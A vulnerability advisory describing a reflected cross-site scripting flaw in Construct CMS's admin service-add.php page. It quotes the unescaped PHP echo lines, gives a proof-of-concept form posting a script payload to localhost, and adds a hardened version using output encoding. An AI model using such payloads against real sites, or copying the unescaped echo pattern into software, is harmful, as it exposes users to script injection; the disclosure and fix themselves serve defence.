Construct CMS - Cross-Site Scripting - CXSecurity.com

Vulnerability ID: 1215302 | Vulnerability type:
Published: 2018-07-08 | Updated: 2018-07-08
CVE ID: N/A | CNNVD-ID: N/A
Affected platform: N/A | CVSS score: N/A
|Vulnerability source
https://cxsecurity.com/issue/WLB-2018070079
|Vulnerability details
Vulnerability details have not yet been disclosed
|Vulnerability EXP
Title : Construct CMS - Cross-Site Scripting
Author : Abolfazl Hajizade
Category : Webapps 
Tested on: Windows-linux
Google Dork: N/A


Vulnerable page: 
/construct/upload/cms/admin/service-add.php

Vulnerable Source: 

line 133: "<?php if(isset($_POST['name'])){echo $_POST['name'];} ?>"

line 139: "<?php if(isset($_POST['slug'])){echo $_POST['slug'];} ?>"

POC: 

<html>
<body>
<form action="http://localhost/construct/upload/cms/admin/service-add.php" method="post">

<input type="text" name="name" value="<script>alert('ultrasec')</script>"/>

<input type="submit" value="exploit"/>

</form>
</body>
</html>
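
A hardened form of the two echoes quoted under "Vulnerable Source", as an added example (not Construct CMS code and not from the advisory author). It assumes both values are printed inside a double-quoted value="..." attribute; old_input() and $post are hypothetical names, and $post stands in for $_POST so the snippet runs from the command line.

```php
<?php
// Added example. Assumption: lines 133 and 139 of service-add.php sit inside
// value="..." attributes of the "name" and "slug" inputs.
//
// Before (advisory, line 133): if(isset($_POST['name'])){echo $_POST['name'];}
// Before (advisory, line 139): if(isset($_POST['slug'])){echo $_POST['slug'];}

/**
 * Hypothetical helper: return a submitted field encoded for use in HTML text
 * or inside a quoted attribute.
 */
function old_input(array $post, string $key): string
{
    $value = $post[$key] ?? '';

    // A request such as name[]=x turns the field into an array. Echoing that
    // prints "Array" with a notice, and htmlspecialchars() rejects it, so any
    // non-string value is treated as empty.
    if (!is_string($value)) {
        return '';
    }

    // ENT_QUOTES encodes both ' and " so the value cannot close the attribute.
    // ENT_SUBSTITUTE replaces invalid UTF-8 sequences instead of returning
    // an empty string for the whole value.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed sample input: the value submitted by the PoC form above, plus
// an array-valued field to exercise the non-string branch.
// In the real page this would be $_POST.
$post = [
    'name' => "<script>alert('ultrasec')</script>",
    'slug' => ['unexpected' => 'array'],
];
?>
<input type="text" name="name" value="<?= old_input($post, 'name') ?>">
<input type="text" name="slug" value="<?= old_input($post, 'slug') ?>">
```

With this encoding the submitted markup is rendered as literal text in the field instead of being parsed as a script element.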

================================ 

WebSite : UltraSec.Org 
Channel : @UltraSecurity 
Email : zeroday1010@gmail.com 

Special Thanks : ashkan moghaddas , MrQadir , Milad Ranjbar